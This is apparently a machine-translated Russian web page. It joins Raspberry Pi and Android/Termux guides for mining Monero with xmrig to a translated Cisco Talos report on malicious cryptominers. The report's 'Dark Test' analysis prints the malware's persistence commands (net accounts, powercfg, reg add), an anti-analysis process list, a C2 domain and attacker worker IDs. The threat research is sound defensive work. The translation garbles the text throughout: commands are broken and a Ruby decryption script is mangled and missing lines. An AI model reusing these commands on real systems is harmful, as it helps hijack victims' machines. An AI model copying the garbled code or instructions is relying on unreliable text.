Для майнинга xmr на raspberry pi вам понадобятся некоторые пакеты, запускаемые с программным обеспечением для майнинга.Они самые распространенные, такие как CMake и git. Но мы не собираемся устанавливать их через обычный терминал, мы собираемся устанавливать их из специального 64-битного терминала. Следующие ниже команды устанавливают 64-битный терминал.

sudo apt-get install -y raspbian-nspawn-64

Когда 64-битный терминал завершит установку, убедитесь, что вы выполнили приведенную ниже команду в обычном терминале, поскольку он запускает 64-битный терминал и готовит его к использованию.

ds64-оболочка

После того, как вы подготовили и настроили 64-битный терминал, выполните следующую команду, чтобы обновить пакеты в 64-битном терминале.Эта команда также установит зависимости для запуска майнера xmr.

sudo apt-get update && sudo apt-get upgrade && sudo apt-get install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev

После того, как ваш 64-битный терминал завершит работу, перезагрузите raspberry pi, так как он активирует все новые пакеты на вашем raspberry pi, и тогда вы будете готовы к установке майнера.

Теперь майните XMR на Raspberry Pi
Monero

Все готово и можно приступить к установке xmrig и добыче xmr на Raspberry Pi.Эта часть займет немного времени, поскольку xmrig необходимо скомпилировать и установить на ваш пи. Выполните следующую команду:

git clone https://github.com/xmrig/xmrig.git cd xmrig && mkdir build && cd build && cmake .. && make

Этот процесс займет от 16 до 30 минут в зависимости от размера оперативной памяти и скорости процессора. Как только он завершится, ваш Pi сможет майнить xmr. Выполните команду ниже, чтобы запустить майнер. Обязательно установите -u в качестве имени пользователя, которое в настоящее время настроено как мое, а в поле -o укажите пул xmr по вашему выбору.

./xmrig —donate-level 1 -o pool.minexmr.com:4444 -u 47HqXyfRx6HAhazGSaDp5p3VFyNMtDviQCPo1xHn5hVgezGY1eLiNW4bep9wmi2gKrH8BWXE9CJK9b

Получайте удовольствие от майнинга xmr на Raspberry Pi. И вы также можете настроить это на нескольких Raspberry Pi для увеличения скорости. Пожалуйста, сделайте пожертвование, так как этот сайт можно использовать бесплатно, а хостинг — нет.

Майнинг криптовалют на Android 2021

В этом посте мы увидим шаг за шагом, как майнить Monero Coin «XMR» на android

Давайте начнем:

Сначала вам нужно установить Termux на свой мобильный телефон из Play Store

После установки Следуйте этим командам и помещайте их в Termux одну за другой, «не нужно хорошо разбираться в ubuntu, linux и т. Д.»…. «просто следуйте им и убедитесь, что все команды выполнены правильно … Давайте начнем ….

Примечание: при каждой введенной вами команде они будут спрашивать вас, хотите ли вы продолжить» нажмите y, чтобы продолжить «

1 — откройте Termux и напишите первую команду: apt-get update && apt-get upgrade

2- apt-get install wget

3- apt-get install proot

4- apt-get install git

5- cd ~

6- git clone http: // git: //github.com/MFDGaming/ubuntu-in-termux. git

7- ls «для проверки файлов или папок»

8- cd ubuntu-in-termux

9- ls

10- chmod + x ubuntu.sh — Зарегистрировано на Namecheap.com

11 — ./ubuntu.sh

12- ./startubuntu.sh

13- apt update

14- apt upgrade

15- apt-get install git build-essential cmake libuv1-dev libmicrohttpd-dev libssl-dev

16- git clone http: // git: //github.com/xmrig/xmrig.git

17- ls

18- cd xmrig

19- ls

20- mkdir build

21- ls

22- cd build

23- apt-get update

24- apt-get install libhwloc-dev

25- cmake..

26- make «это долгий процесс, так что проявите терпение»

27- exit

28- cd ubuntu-in-termux

29- ls

30- ./startubuntu.sh

31- cd xmrig

32- cd build

33- ./xmrig —randomx-mode = light —cpu-no-yield —threads = 7 -o http://pool.supportxmr.com:3333 -u (затем введите ваш адрес вашего кошелька Monero для получения на него) -k -p (затем укажите ваше имя пользователя воркера = Имя, которое вы хотите отображать для своего воркера, входит в поле пароля майнера ‘-p MyWorker’)

http: // бассейн.supportxmr.com:3333 он может меняться в зависимости от того, какой пул и порт вы используете «Здесь мы используем пример веб-сайта SupportXMR, вы можете использовать тот же»

Вы можете использовать те же шаги на ПК, но вы должны внести некоторые изменения в некоторые шаги … но есть простой способ для ПК, который представляет собой программное обеспечение от проверенной компании, и вы можете добывать много других монет. Посетите их здесь

Чтобы остановить майнинг, введите: exit

И чтобы снова начать, выполните шаги с 28 по 33

(см. Рис. Ниже)

Наконец, вы должны получить этот результат «майнинг работает нормально»

1 Еще одна вещь, чтобы проверить, насколько вы майните, посетите SupportXMR

и укажите свой адрес xmr «имейте в виду, что статистика требует больше, чем 2H, чтобы начать показывать «

», чтобы получить адрес xmr, вы можете просто открыть кошелек на официальном сайте Monero

Сообщите нам, работает ли это для вас !!

Cisco Talos Intelligence Group — Комплексный анализ угроз: выкуп Где? Вредоносный захват майнеров криптовалюты, генерирующий 9000 миллионов долларов

Темная сторона цифровой золотой лихорадки


Этот пост был написан Ником Биазини, Эдмундом Брумагином, Уорреном Мерсером и Джошем Рейнольдсом при участии Азима Ходиджбаева и Дэвида Либенберга.


Краткое содержание

Ландшафт угроз постоянно меняется; За последние несколько лет векторы, методы и полезные нагрузки вредоносных программ быстро эволюционировали. В последнее время, когда стоимость криптовалюты резко возросла, атаки, связанные с майнингом, стали основным интересом для многих злоумышленников, которые начинают осознавать, что они могут реализовать все финансовые преимущества предыдущих атак, таких как программы-вымогатели, без необходимости фактически задействовать жертву и без внешнее внимание правоохранительных органов, которое сопровождается атаками программ-вымогателей.

Такой акцент на майнинге неудивителен, учитывая, что различные криптовалюты, а также «блокчейн» были повсюду в новостях, поскольку стоимость этих валют экспоненциально увеличивалась. Злоумышленники обратили внимание на эти достижения и создают новые атаки, которые помогают им монетизировать этот рост. За последние несколько месяцев Talos заметил заметное увеличение объема программного обеспечения для майнинга криптовалюты, которое злонамеренно доставляется жертвам.

В этой новой бизнес-модели злоумышленники больше не наказывают жертв за открытие вложения или запуск вредоносного сценария, взяв системы в заложники и требуя выкуп.Сейчас злоумышленники активно используют ресурсы зараженных систем для майнинга криптовалюты. В этих случаях, чем лучше производительность и вычислительная мощность целевой системы, тем лучше для злоумышленника с точки зрения получения дохода. Устройства Интернета вещей, с отсутствием мониторинга и повседневного взаимодействия с пользователем, быстро становятся привлекательной целью для этих злоумышленников, поскольку они предлагают вычислительную мощность без прямого контроля со стороны жертвы. Хотя вычислительные ресурсы большинства устройств IoT обычно ограничены, количество открытых устройств, уязвимых для общедоступных эксплойтов, велико, что может сделать их привлекательными для киберпреступников.

Чтобы оценить финансовую выгоду в перспективе, средняя система, вероятно, будет генерировать около 0,25 доллара США в день, а это означает, что злоумышленник, завербовавший 2000 жертв (несложный подвиг), может зарабатывать 500 долларов в день или 182 500 долларов в год. Talos наблюдал ботнеты, состоящие из миллионов зараженных систем, что, используя нашу предыдущую логику, означает, что теоретически эти системы могут быть использованы для получения более 100 миллионов долларов в год. Важно отметить, что из-за нестабильности на рынках криптовалют эти значения могут резко меняться день ото дня.Все расчеты в этом блоге были сделаны на основе XMR / USD на момент написания этой статьи.

Все это делается с минимальными усилиями после первоначального заражения. Что еще более важно, с небольшими шансами на обнаружение этот поток доходов может продолжаться бесконечно. Хотя это впечатляющие цифры, важно также учесть некоторые детали, которые могут еще больше увеличить ценность этих атак в геометрической прогрессии:

  • Стоимость многих криптовалют стремительно растет.Monero, одна из самых популярных целей для майнинга, выросла на 3000% за последние 12 месяцев.
  • Эти атаки намного более скрытны, чем их предшественники. Злоумышленники не крадут у своих жертв ничего, кроме вычислительной мощности, а программное обеспечение для майнинга технически не является вредоносным — поэтому теоретически жертвы могут оставаться частью ботнета злоумышленника до тех пор, пока злоумышленник захочет.
  • Как только валюта добыта, неизвестно, что злоумышленник может с ней сделать.Это может стать долгосрочной схемой инвестиций (или даже выхода на пенсию) для этих злоумышленников — сидения на этой валюте, пока она не достигнет такой точки, когда злоумышленник решит обналичить.

Введение


В течение последних нескольких лет программы-вымогатели доминировали в области угроз и не зря. Это создает высокодоходную бизнес-модель, которая позволяет злоумышленникам напрямую монетизировать свою гнусную деятельность. Однако есть несколько ограничений при использовании программ-вымогателей.Во-первых, лишь небольшой процент зараженных пользователей фактически заплатит выкуп, который требует злоумышленник. Во-вторых, по мере того, как системы и технологии улучшаются в обнаружении и блокировании атак программ-вымогателей, круг возможных жертв меняется. Потенциальные жертвы во многих странах не имеют финансовых возможностей заплатить 300-500 долларов за получение своих данных. Возможно, связанное с этими вышеупомянутыми ограничениями, мы начали наблюдать устойчивый сдвиг в доставляемой полезной нагрузке. Это особенно верно для некоторых из наиболее распространенных методов распространения вредоносных программ, таких как наборы эксплойтов и спам-кампании.

За последние несколько месяцев Talos начал отмечать заметный рост количества майнеров криптовалюты, доставляемых жертвам. Криптовалюта и «блокчейн» были во всех новостях в последние несколько месяцев, поскольку стоимость этих валют росла экспоненциально. Один из наиболее эффективных способов получения этих валют — это майнинг, и злоумышленники, очевидно, обращают на это внимание.

Что такое «Майнинг»?


На высоком уровне майнинг — это просто использование системных ресурсов для решения больших математических вычислений, в результате которых решателям присуждается некоторое количество криптовалюты.Прежде чем мы углубимся в майнинг, давайте рассмотрим валюты, которые имеют смысл майнить.

Биткойн (BTC) — самая известная и широко используемая криптовалюта с большим отрывом. Его добывали с самого начала, но сегодня майнинг не является эффективным способом создания ценности. Если вы посмотрите на все криптовалюты, есть только пара, которые стоит майнить без специального оборудования, называемого ASIC (интегральные схемы для конкретных приложений). Различия между разными криптовалютами основаны на используемом алгоритме хеширования.Некоторые из них были специально разработаны с целью предотвратить или воспрепятствовать использованию такого специализированного оборудования и больше ориентированы на оборудование потребительского уровня, такое как аппаратные средства ЦП и ГП. В настоящее время наиболее ценной валютой для майнинга на стандартных системах является Monero (XMR), и злоумышленники провели свои исследования. Кроме того, Monero уделяет особое внимание конфиденциальности, и поскольку правительства начали более внимательно изучать Биткойн, Monero и другие монеты с большим упором на конфиденциальность могут стать безопасным убежищем для злоумышленников.

Существует два способа майнинга: либо с помощью отдельного майнера, либо с помощью майнинговых пулов. Крипто-майнинг на основе пула позволяет объединять ресурсы нескольких систем, что приводит к более высокому хешрейту и теоретически к производству большего количества валюты. Это пул-майнинг Monero, который, как мы видели, наиболее часто используется злоумышленниками, поскольку он обеспечивает максимальную отдачу от инвестиций, а необходимое программное обеспечение для майнинга может быть легко доставлено жертвам.Использование объединенного майнинга также максимизирует эффективность вычислительных ресурсов стандартных систем, которые злоумышленники пытаются взломать. Это похоже на запуск распределенных атак типа «отказ в обслуживании» (DDoS), когда 100 000 машин, наводняющих цель поддельным трафиком, становятся намного более эффективными по сравнению с одной системой, находящейся под контролем злоумышленника, отправляющей поддельный трафик.

Как работает майнинг на основе пула?


Майнинг на основе пула координируется с помощью «идентификаторов рабочих».Эти идентификаторы связывают отдельную систему с большим пулом и гарантируют, что монеты, добытые пулом, связанным с конкретным идентификатором Worker ID, будут доставлены правильному пользователю. Именно эти идентификаторы Worker ID позволили нам определить размер и масштаб некоторых вредоносных операций, а также получить представление о размере доходов, которые злоумышленники получают. Для целей этого обсуждения мы будем предполагать следующее:
  1. Предполагается, что количество хэшей в секунду, которое может вычислить обычный компьютер, составляет ~ 125 H / s.
  2. Хотя на самом деле майнинг не всегда гарантирует успешную генерацию добываемой криптовалюты, мы предполагаем, что для наших целей он успешен, поскольку позволяет лучше понять потенциальную прибыль этих злонамеренных майнинговых пулов.
Эти майнеры обычно работают из командной строки и используют ряд аргументов, используемых для определения того, как должен выполняться майнинг. Типичный пример синтаксиса командной строки, используемого для запуска программного обеспечения интеллектуального анализа данных и указания аргументов, приведен ниже: (обратите внимание, что существуют различия в именах используемых параметров в зависимости от конкретного используемого программного обеспечения для интеллектуального анализа данных.)

Пример синтаксиса командной строки


Как вы можете видеть, требуются два основных значения аргумента: URL-адрес для пула майнинга и « идентификатор рабочего », который используется для привязки активности майнинга, происходящей в системе, к определенному пулу майнинга, который используется для управления выплатами. проведенный. Однако в ходе нашего расследования мы обнаружили множество других параметров, которые злоумышленники или майнеры могут указать, пытаясь скрыть свою деятельность. Если программное обеспечение для майнинга выполняется без этих параметров, жертвы могут заметить значительное снижение производительности своих систем, поскольку ограничения на вычислительные ресурсы не применяются.Эти параметры включают:
  • Ограничения на использование ЦП.
  • Пределы температуры системы.
  • Количество используемых ядер.
  • Периоды сна.
Каждая программа для майнинга поставляется со своим собственным набором флагов, которые используются различными способами как законными, так и злонамеренными майнерами. Мы заметили, что эти параметры обычно развертываются злоумышленниками, когда они достигают стойкости (то есть путем создания запланированных задач или ключей запуска, которые запускают майнер с использованием командного процессора Windows с указанием используемых аргументов).

Истоки в подземелье


Talos наблюдает за обсуждениями использования криптомайнеров в качестве вредоносной нагрузки как китайскими, так и российскими преступными группировками. Мы впервые наблюдали за тем, как китайские участники обсуждали майнеров и связанные с ними майнинговые бот-сети в ноябре 2016 года, и с тех пор интерес к ним неуклонно растет.

Что касается российской подземной добычи, то за последние шесть месяцев произошел значительный сдвиг, связанный с добычей полезных ископаемых. На ведущих российских хакерских форумах было много обсуждений и сделано несколько предложений.Обсуждения разделились, и большая часть обсуждений была посвящена продаже доступа к майнинговым ботам, а также разработчикам ботов, желающим купить доступ к скомпрометированным хостам для предполагаемой цели использования их для крипто-майнинга. Рост популярности также сопровождался кривой обучения, связанной с майнингом, включая лучшее понимание того, сколько монет можно добыть, и подходящее время для проведения майнинга. Что касается вредоносных программ, которые можно использовать для майнинга, большинство из них написано на C # или C ++, и, как это принято на этих форумах, они рекламируются с низким уровнем обнаружения, настойчивостью и постоянным развитием.Во многих случаях мы отслеживаем обновления этих угроз ежедневно или еженедельно.

В целом злоумышленники довольны объемом доходов, которые приносят боты, а также потенциалом их увеличения. Это свидетельствует об угрозе, которая со временем станет более распространенной. Давайте посмотрим, как работает вредоносный майнинг, и какие угрозы их доставляют.

Вредоносный майнинг


Вредоносный майнинг находится в центре внимания этого поста, поскольку это новая тенденция в ландшафте угроз.Злоумышленники всегда ищут способы монетизировать свою гнусную деятельность, и злонамеренный майнинг быстро становится дойной коровой для плохих парней.

За последние несколько лет программы-вымогатели доминировали в ландшафте угроз с точки зрения финансово мотивированных вредоносных программ и не без оснований. Это чрезвычайно прибыльная бизнес-модель, как мы показали в нашем исследовании Angler Exploit Kit, где, по нашим оценкам, противники, стоящие за Angler, могли зарабатывать не менее 30 миллионов долларов в год.Однако с успехом приходит внимание, и вместе с ним повышается внимание к прекращению этого вида деятельности. И операционные системы, и поставщики средств безопасности стали лучше останавливать программы-вымогатели до того, как они затронули большую часть системы.

Злоумышленникам остается принять интересное решение: продолжать использовать программы-вымогатели в качестве основного источника дохода, поскольку количество пользователей и уязвимых систем продолжает сокращаться или начинать использовать другие полезные нагрузки. У злоумышленников нет недостатка в опциях, включая банковские трояны, ботов, кражи учетных данных и вредоносное ПО для мошенничества с кликами и многое другое.

Так почему же стоит выбрать ПО для майнинга криптовалют?

Существует множество причин, по которым злоумышленники могут использовать крипто-майнинг для получения дохода. Одна из вероятных причин заключается в том, что с этой инфекцией в значительной степени нужно бороться. После того, как в систему был брошен майнер, и она начала добывать, с точки зрения противника больше ничего не нужно. Никаких командных действий и действий по управлению они не производят, и они стабильно приносят доход до тех пор, пока не будут удалены. Поэтому, если злоумышленник замечает прекращение майнинга узлов в свой пул, пора заразить больше систем.Во-вторых, большинство пользователей не замечает этого. Действительно ли пользователь заметит, что майнинг идет, пока он читает электронную почту, просматривает веб-страницы или пишет свое последнее предложение? С этой точки зрения майнеры — это полная противоположность программ-вымогателей, которые как можно дольше прячутся в поле зрения пользователей. Чем дольше пользователь не замечает, что майнер работает, тем больше потенциальная выплата за эту активность.

Самая большая причина их всех — потенциальные денежные выплаты, связанные с майнингом.Если это не принесет прибыли, плохие парни не воспользуются этим. В этом смысле злонамеренные майнеры могут быть довольно крупным источником дохода. Самая большая стоимость, связанная с майнингом, — это оборудование для майнинга и электричество для питания оборудования для майнинга. Используя злонамеренных майнеров, злоумышленники могут полностью исключить обе эти затраты. Поскольку они могут использовать вычислительные ресурсы, имеющиеся в зараженных системах, они не требуют затрат на электроэнергию или оборудование, и злоумышленники получают все преимущества добытой монеты.

Давайте подробнее рассмотрим размер дохода, который эти системы потенциально могут генерировать. Как упоминалось ранее, хешрейт для компьютеров может широко варьироваться в зависимости от типа используемого оборудования и средней загрузки системы вне майнеров. Средняя система, вероятно, будет вычислять где-то около 125 хэшей в секунду. Одна только система без каких-либо затрат на оборудование или электроэнергию могла бы генерировать около 0,25 доллара США в день, что не кажется много, но когда вы начинаете объединять системы, потенциальный доход быстро возрастает.

Некоторые из крупнейших ботнетов в ландшафте угроз состоят из миллионов зараженных систем, находящихся под контролем злоумышленника. Представьте, что вы контролируете небольшую часть систем, которые являются частью одной из этих ботнетов (~ 2000 хостов). Сумма дохода, который может быть получен в день, значительно увеличивается до более чем 500 долларов США в день или 182 500 долларов США в год. Как мы продемонстрируем позже в этом посте, мы видели пулы вредоносных программ, которые намного превышают 125 KH / s, необходимые для получения такого дохода.

В ходе одной из проанализированных нами кампаний злоумышленник сумел собрать достаточно вычислительных ресурсов для достижения скорости хэширования 55,20 KH / s. Как видно на скриншоте ниже, общая выплаченная сумма составила 528 XMR, что составляет примерно 167 833 доллара США. В этом конкретном случае майнинг-пул понял, что «Worker ID» использовался ботнетом для майнинга Monero.

Статистика идентификатора работника


В серии атак, которые мы наблюдали в конце декабря 2017 года, злоумышленники использовали эксплойты, нацеленные на уязвимости Oracle WebLogic (CVE-2017-3506 / CVE-2017-10271).В этих случаях успешная эксплуатация часто приводит к установке и запуску программного обеспечения для майнинга.

Историческая скорость хеширования


Анализируя размер и масштабы этой кампании, мы заметили, что вскоре после начала этих атак используемый «Worker ID» генерировал более 500 KH / s. На момент написания этот конкретный злоумышленник все еще генерирует около 350 KH / s.

Текущая скорость хеширования


Используя онлайн-калькулятор, который измеряет хешрейт, энергопотребление и стоимость, затем оценивает прибыльность.Учитывая скорость хеширования 350 KH / s, расчетное количество Monero, которое будет добываться в день, составило 2,24 XMR. Это означает, что злоумышленник может генерировать около 704 долларов США в день, что составляет 257 000 долларов США в год. Это ясно показывает, насколько прибыльной может быть такая операция для злоумышленников.

Анализ статистических данных и информации истории платежей, связанных с этим «идентификатором работника», показывает, что всего было получено 654 XMR. На момент написания это стоило бы примерно 207 884 доллара.

Worker ID История платежей


При анализе вредоносных кампаний, связанных с распространением программного обеспечения для майнинга, мы выявили десятки крупных «идентификаторов сотрудников». Более пристальный взгляд на 5 крупнейших операций, которые мы проанализировали, показывает, сколько денег можно заработать, используя этот подход.

Расчеты больших объемов


Еще одно преимущество заключается в том, что стоимость добытых Monero со временем продолжает расти.Как и Биткойн, оценка Monero за последний год резко выросла с 13 долларов в январе 2017 года до более 300 долларов на момент написания этой статьи, а иногда приближалась к 500 долларам. Пока продолжается повальное увлечение криптовалютой и ценность продолжает расти, стоимость каждой добытой криптовалюты увеличивается, что, в свою очередь, увеличивает объем генерируемого дохода. Это покрывает некоторые финансовые причины, по которым злоумышленники используют вредоносный майнинг, но в первую очередь, как эти майнеры попадают в системы.

Угрозы, доставляющие майнеры


Майнеры криптовалюты — это новый фаворит злоумышленников, и они доставляются конечным пользователям разными способами. Обычные способы доставки майнеров, которые мы наблюдаем, включают рассылку спама, наборы эксплойтов и напрямую через эксплойты.

Электронная почта на основе


Продолжаются спам-кампании, доставляющие самые разные полезные нагрузки, такие как программы-вымогатели, банковские трояны, майнеры и многое другое. Ниже приведены примеры кампаний по доставке майнеров, которые мы видели.Обычно эти инфекции работают так, что пользователю отправляется электронное письмо с вложением. Эти вложения обычно имеют архив, содержащий документ Word, который загружает майнер с помощью вредоносного макроса или распаковывает сжатый исполняемый файл, который инициирует заражение майнингом. Во многих кампаниях, наблюдаемых Талосом, включенный двоичный файл представляет собой широко распространенный майнер Monero, который запускается с идентификатором воркера-злоумышленника и пулом, что позволяет злоумышленникам воспользоваться преимуществами майнинга.

Ниже приведен пример одной из этих кампаний конца 2017 года.Это подделка заявления о приеме на работу, которое включает документ Word, якобы являющийся резюме потенциального кандидата.

Пример вредоносного электронного письма


Как видите, электронное письмо содержит текстовый документ, который при открытии выглядит следующим образом.

Пример документа Word


Как это часто бывает с вредоносными документами Word, открытие документа приводит к загрузке файла. Это пример более крупной кампании майнеров, получившей название bigmac на основе используемых соглашений об именах.

Это изображение побуждает пользователя включить содержимое макроса в документе, который по умолчанию заблокирован. После щелчка Word выполняет серию сильно запутанных макросов VBA с помощью функции Document_Open:

Сильно запутанные макросы VBA с использованием Document_Open ()

Макрос приводит к вызову команды Shell:

Сильно запутанный макрос VBA VBA.Shell Call


Мы можем увидеть, что выполняется этой командой после деобфускации, установив первый параметр в вызове MsgBox:

MsgBox для замены оболочки


Это позволит получить исполняемый файл удаленно с помощью System.Net.WebClient и запустите его с помощью Start-Process. Это также можно увидеть по динамической активности в Threat Grid:

Документ Office запускает индикатор Powershell в сетке угроз


Мы также определяем, что загруженный двоичный файл пытается замаскироваться, используя расширение изображения:

Сетка для идентификации расширения переносимого исполняемого образа


В этом случае загружаемый двоичный файл представляет собой переносимый исполняемый файл, написанный на VB6, который выполняет вариант майнера xmrig XMR CPU.Это действие можно увидеть динамически в сетке угроз:

xmrig Выполнение в сетке угроз


Динамическую активность майнеров также можно наблюдать в линейке продуктов AMP for Endpoints. Пример ниже можно увидеть в траектории устройства портала:

Динамическое выполнение майнера в AMP для траектории устройства конечной точки


Сетевой трафик майнинга также можно классифицировать с помощью Cognitive Threat Analytics для выявления майнеров в корпоративных средах:

Классификация трафика майнинга с использованием аналитики когнитивных угроз


Dark Test Cryptomining Malware


Dark Test (название взято из декомпилированного исходного кода) — это пример вредоносной программы Cryptomining, написанной на C #, которая сбрасывает упакованный UPX вариант майнера xmrig XMR CPU.Будучи написанным на C #, двоичный файл содержит .NET IL (промежуточный язык), который можно декомпилировать обратно в исходный код. Код C # сильно запутан и содержит зашифрованный раздел ресурсов для всех строк, на которые есть ссылки, и функций, которые разрешаются во время выполнения. В следующем разделе мы подробно обсудим эти методы.

Обфускация темного теста


Dark Test использует упаковщик, который после распаковки создает приостановленную версию самого себя с помощью CreateProcessA и перезаписывает себя в памяти распакованной версией двоичного файла с помощью WriteProcessMemory.Исходный двоичный файл можно восстановить, просто установив точку останова на WriteProcessMemory в отладчике и выполнив дамп с адреса буфера lpBuffer до nSize.

Dark Test содержит сильно запутанный код C #, состоящий из большого количества мусорных инструкций, арифметические операции для перехода к различным разделам кода, зашифрованные строки, хранящиеся в его разделе ресурсов, и функции, которые разрешаются во время выполнения. Функции разрешаются при загрузке с использованием арифметических операций, в результате чего метаданныеToken передаются в Method.ResolveMethod и MethodHandle.GetFunctionPointer:

Разрешение динамического метода с использованием метаданных Токен Целое число


Функции также вызываются косвенно с помощью функции calli, которой передается указатель на точку входа функции и ее сопутствующие параметры:

Вызовы разрешенных функций во время выполнения с использованием calli


Функция дешифрования принимает три целочисленных параметра. Первые два составляют смещение поиска для длины и смещения дешифруемой строки, а третий — ключ XOR для строки с этим смещением:

Функция дешифрования темной тестовой строки


При вычисленном смещении первые четыре байта — это смещение зашифрованного текста, а следующие четыре — это длина дешифруемой строки.Затем он выполняет итерацию для этой длины в цикле XOR for, чтобы расшифровать строку по этому смещению. Эти целочисленные параметры вычисляются во время выполнения, как правило, посредством серии арифметических операций и ссылочных объектов среды выполнения:

Вызов функции дешифрования темной тестовой строки


Результатом в данном случае является строка «-o pool.minexmr.com:4444 -u», которая представляет собой комбинацию домена и порта для пула майнинга, в котором участвует майнер, и параметр имени пользователя без значения.Хотя эти строки расшифровываются во время выполнения, их легко увидеть при выполнении динамической активности в Threat Grid (в этом случае для использования выбран другой пул из конфигурации):

Аргументы командной строки для динамической активности майнера

Объекты и функции, разрешенные во время выполнения, затрудняют извлечение всех строк, поскольку декомпиляция не всегда идеальна, и не все строки декодируются во время динамического анализа из-за различных ветвей кода (как показано в примере выше).Вычисление длины num6 дает три уникальных байта (в десятичном формате): [106, 242, 28] для каждой длины. В результате мы можем искать эти байты (являющиеся первыми тремя при вычислении длины), чтобы найти вычисленные смещения во время выполнения. Как только мы узнаем длину, мы можем извлечь смещение зашифрованного текста из предыдущих четырех байтов, а затем перебрать ключ XOR по этому смещению, перебирая все возможности и проверяя результирующие допустимые диапазоны ASCII:
 #! / Usr / bin / ruby

fr = File.read (ARGV [0])
fb = фр.в)
        конец
        если закончено
          помещает "Найден возможный ключ XOR для строки: # {result.pack (" I * "). split (" \ x00 "). join} длины: # {length}"
        конец
      конец
    конец
  конец
конец

 
Этот метод грубой силы дает некоторые недопустимые результаты, однако также предоставляет строки с открытым текстом после ручного просмотра, все из которых доступны в приложении. Следует выделить несколько интересных строк, предназначенных для того, чтобы компьютер оставался в сети для продолжения майнинга:
 / C net accounts / forcelogoff: no 
Это предотвращает принудительный выход из системы удаленными администраторами.
 / C чистые счета / maxpwage: без ограничений 
Это устанавливает неограниченный срок действия пароля, что, в свою очередь, предотвращает истечение срока действия пароля.
 / C powercfg / x / тайм-аут ожидания-ac 0 
Это предотвратит переход компьютера в режим ожидания и, таким образом, продолжение операций по добыче полезных ископаемых, когда компьютер находится в режиме ожидания.
 / C reg add "HKEY_CURRENT_USER \ Control Panel \ Desktop" / v ScreenSaveTimeOut / t REG_SZ / d 600000000 / f длины: 99 
Это предотвратит запуск заставки.

Далее наблюдаемые строки предназначены для антианализа:

 processxp
PROCEXP
ПРОЦЕССШЕКЕР
ProcessHacker
processxp64
Детектор обнаружения!
Прозрачный!
taskmgr 

Темный тестовый сетевой трафик


В api отправляются два запроса GET.ipfy.org используется для идентификации общедоступного IP-адреса. Затем следует запрос GET к qyvtls749tio [.] Com, который отправляет HwProfileInfo.szHwProfileGuid для идентификации, 64-битный флаг, параметр видеокарты (который всегда равен нулю) и количество ядер ЦП. В ответе сервера указаны луковые URL-адреса youronionlink [.] Для двух исполняемых файлов: bz.exe и cpu.zip

Аргументы командной строки для динамической активности майнера


Как ни странно, это недействительный адрес .onion и, скорее всего, это заполнитель с сервера для этого дроппера или ребенок, который установил его, не заменяя то, что шлюз возвращал дропперу по запросу.При поиске этого шаблона мы обнаружили действующий адрес pastebin, содержащий ряд команд SQL для настройки базы данных с этими доменами с русскими комментариями:

Pastebin SQL-команды


Это также подразумевает возможность использования сборщика или распределенного шлюза. Дальнейшие поиски выявили ряд имен файлов в естественных условиях, которые соответствуют товарам:

Dark Test Virus Общее количество наблюдаемых в естественных условиях имен файлов


Это может указывать на варез как на возможный вектор распространения этого вредоносного ПО.

Темный тест, версия 2


В течение ноября мы начали наблюдать образец с такими же параметрами управления и контроля, пулом майнинга и именем исполняемого файла сохраняемости, что и Dark Test. Однако он не отбрасывал и не запускал отдельный двоичный файл xmrig, а вместо этого содержал статически связанную версию. Из-за общих атрибутов с первой версией Dark Test мы считаем, что это новая итерация, написанная на Visual C ++, а не на C #. Бинарный файл поставляется с самораспаковывающимся установщиком NSIS, который запускает код распаковки, который записывается в только что созданный приостановленный процесс и возобновляет основной поток.Заметным отличием является более обширный список строк антианализа, поиск которых выполняется с помощью Process32FirstW:

Строки антианализа


Интересным дополнением является vnc.exe для обнаружения VPS или систем анализа, подключенных к VNC.

Набор эксплойтов на основе


В дополнение к рассмотренным выше кампаниям по рассылке спама, Talos также наблюдал за эксплойтом RIG, доставляющим майнеры с помощью Smokeloader за последние пару месяцев. Фактическое заражение с помощью набора эксплойтов довольно стандартно для RIG-активности.Однако самое замечательное в майнинге — это то, что в системе остались легко отслеживаемые элементы, а именно «Worker ID», как показано ниже:

Синтаксис командной строки


Используя идентификатор рабочего:
 43Z8WW3Pt1fiBhxyizs3HxbGLovmqAx5Ref9HHMhsmXR2qGr6Py1oG2QAaMTrmqWQw85sd1oteaThcqreW4JucrLGAqiVQD 
мы начали копаться в количестве хэшей, которые добывает эта система. Мы обнаружили рабочего, который колебался от 25 до 60 кГц / с. Принимая среднее значение 42.5 KH / s, этот актер зарабатывал около 85 долларов в день.

Это может показаться незначительной суммой денег, но учтите, что майнер может работать в течение нескольких месяцев, если не лет, без какого-либо воздействия на него без дополнительного обслуживания, требуемого исполнителем. Единственные эксплуатационные расходы связаны с арендой эксплойт-кита и соответствующей инфраструктуры. После того, как жертвы скомпрометированы, деятельность продолжается за 31 000 долларов в год.

Однако, когда мы начали оглядываться назад, эта кампания продолжалась в течение последних шести месяцев с пиковой скоростью хеширования, превышающей 100 KH / sec.

Историческая скорость хеширования


Кампания, похоже, набрала обороты, начиная с сентября 2017 года, но у нас есть свидетельства того, что майнеры были развернуты еще в июне или июле 2017 года. Внезапно деятельность по добыче полезных ископаемых полностью прекратилась к концу октября и снова возобновилась в середина декабря. На момент написания этого поста он все еще работает. Это показывает потенциальную прибыль от использования набора эксплойтов для развертывания майнеров с помощью загрузчика вредоносных программ, такого как Smokeloader.

Активная эксплуатация


Помимо угроз, нацеленных на пользователей, Talos также обнаружил, что майнеры монет доставляются через активную эксплуатацию в нашей инфраструктуре приманок. Это включает в себя использование нескольких различных эксплойтов для доставки этих типов полезной нагрузки. Были широко распространены сообщения об использовании EternalBlue для установки майнеров, а также различных эксплойтов Apache Struts2, а совсем недавно — эксплойта Oracle WebLogic. Этот тип полезной нагрузки идеально подходит для активного использования, поскольку не требует постоянного доступа к конечной системе, в значительной степени прозрачен для конечного пользователя и, наконец, может привести к значительной финансовой прибыли.

Когда вы берете угрозы, которые доставляются пользователям по электронной почте и через Интернет, а также системы, подключенные к Интернету, которые скомпрометированы для доставки полезной нагрузки майнера, очевидно, что сегодня злоумышленники подталкивают майнеров так же, как программы-вымогатели внедрялись в системы год назад. Основываясь на этих доказательствах, мы начали немного глубже изучить фактическую деятельность по добыче полезных ископаемых и системы, которые уже занимались добычей полезных ископаемых.

Более глубокое погружение в горнодобывающую промышленность и рабочих


В течение нескольких месяцев мы начали искать активность майнеров в системах и обнаружили распространенные угрозы, связанные с несколькими различными группами, полагаясь на знакомые приемы для работы в системах.Кроме того, мы обнаружили, что большое количество корпоративных пользователей запускают или пытаются запустить майнеры в своих системах для потенциальной личной выгоды.

